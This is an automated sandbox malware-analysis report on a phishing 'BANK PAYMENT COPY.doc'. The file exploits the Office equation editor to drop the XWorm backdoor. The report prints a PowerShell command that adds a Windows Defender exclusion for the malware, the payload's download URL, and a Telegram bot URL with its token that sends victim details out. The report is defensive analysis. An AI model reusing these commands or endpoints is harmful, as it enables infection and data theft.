                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 4B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3894Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1409Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWindow / User API: threadDelayed 9599Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWindow / User API: foregroundWindowGot 614Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3580Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 3736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 3972Thread sleep time: -420000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exe TID: 4036Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3120Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory written: C:\Users\user\AppData\Roaming\obibingf24242.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeQueries volume information: C:\Users\user\AppData\Roaming\obibingf24242.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeQueries volume information: C:\Users\user\AppData\Roaming\obibingf24242.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obibingf24242.exe PID: 3712, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obibingf24242.exe PID: 3804, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: obibingf24242.exe PID: 3712, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: obibingf24242.exe PID: 3804, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory14
                System Information Discovery
                Remote Desktop Protocol1
                Input Capture
                12
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)21
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Clipboard Data
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate
                NTDS21
                Security Software Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture123
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Masquerading
                Proc Filesystem1
                Remote System Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Modify Registry
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
                Virtualization/Sandbox Evasion
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                Process Injection
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1517840 Sample: BANK PAYMENT COPY.doc Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 46 Initial sample is an obfuscated RTF file 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 23 other signatures 2->52 8 WINWORD.EXE 291 21 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 36 66.63.187.123, 49163, 80 ASN-QUADRANET-GLOBALUS United States 10->36 26 C:\Users\user\AppData\...\obibingf24242.exe, PE32 10->26 dropped 28 C:\Users\user\AppData\...\vnobizxc[1].exe, PE32 10->28 dropped 58 Office equation editor establishes network connection 10->58 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->60 17 obibingf24242.exe 3 10->17         started        file6 signatures7 process8 signatures9 38 Multi AV Scanner detection for dropped file 17->38 40 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->40 42 Machine Learning detection for dropped file 17->42 44 2 other signatures 17->44 20 obibingf24242.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process10 dnsIp11 30 api.telegram.org 20->30 32 api.telegram.org 149.154.167.220, 443, 49164 TELEGRAMRU United Kingdom 20->32 34 various-wages.gl.at.ply.gg 147.185.221.22, 49165, 49166, 49167 SALSGIVERUS United States 20->34 54 Installs new ROOT certificates 20->54 signatures12 56 Uses the Telegram API (likely for C&C communication) 30->56

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                BANK PAYMENT COPY.doc55%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                BANK PAYMENT COPY.doc100%AviraHEUR/Rtf.Malformed
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\obibingf24242.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exe50%ReversingLabsWin32.Backdoor.Xworm
                C:\Users\user\AppData\Roaming\obibingf24242.exe50%ReversingLabsWin32.Backdoor.Xworm
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://ocsp.entrust.net030%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://66.63.187.123/txt/vnobizxc.exeoC:0%Avira URL Cloudsafe
                http://66.63.187.123/txt/vnobizxc.exemmC:0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                various-wages.gl.at.ply.gg0%Avira URL Cloudsafe
                https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.40%Avira URL Cloudsafe
                http://66.63.187.123/txt/vnobizxc.exej0%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                http://66.63.187.123/txt/vnobizxc.exeb:0%Avira URL Cloudsafe
                http://66.63.187.123/txt/vnobizxc.exe100%Avira URL Cloudmalware
                http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                various-wages.gl.at.ply.gg
                147.185.221.22
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4true
                    • Avira URL Cloud: safe
                    unknown
                    various-wages.gl.at.ply.ggtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://66.63.187.123/txt/vnobizxc.exetrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://66.63.187.123/txt/vnobizxc.exemmC:EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/server1.crl0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/botobibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net03obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://66.63.187.123/txt/vnobizxc.exejEQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://66.63.187.123/txt/vnobizxc.exeoC:EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net0Dobibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://secure.comodo.com/CPS0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://66.63.187.123/txt/vnobizxc.exeb:EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/2048ca.crl0obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
                    api.telegram.orgUnited Kingdom
                    62041TELEGRAMRUtrue
                    66.63.187.123
                    unknownUnited States
                    8100ASN-QUADRANET-GLOBALUStrue
                    147.185.221.22
                    various-wages.gl.at.ply.ggUnited States
                    12087SALSGIVERUStrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1517840
                    Start date and time:2024-09-25 08:28:37 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 49s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:BANK PAYMENT COPY.doc
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winDOC@9/13@619/3
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 29
                    • Number of non-executed functions: 7
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 78326.3638089844 for current running targets taking high CPU consumption
                    • Override analysis time to 156652.727617969 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3560 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: BANK PAYMENT COPY.doc
                    TimeTypeDescription
                    02:29:56API Interceptor299x Sleep call for process: EQNEDT32.EXE modified
                    02:30:01API Interceptor8503124x Sleep call for process: obibingf24242.exe modified
                    02:30:02API Interceptor17x Sleep call for process: powershell.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    149.154.167.220https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                      http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                        r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          LUYYSwStKN.ps1Get hashmaliciousXWormBrowse
                            cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                              670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                  payload_1.vbsGet hashmaliciousXWormBrowse
                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                      NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                        66.63.187.12311062370MXQRQ353000718_001.docGet hashmaliciousUnknownBrowse
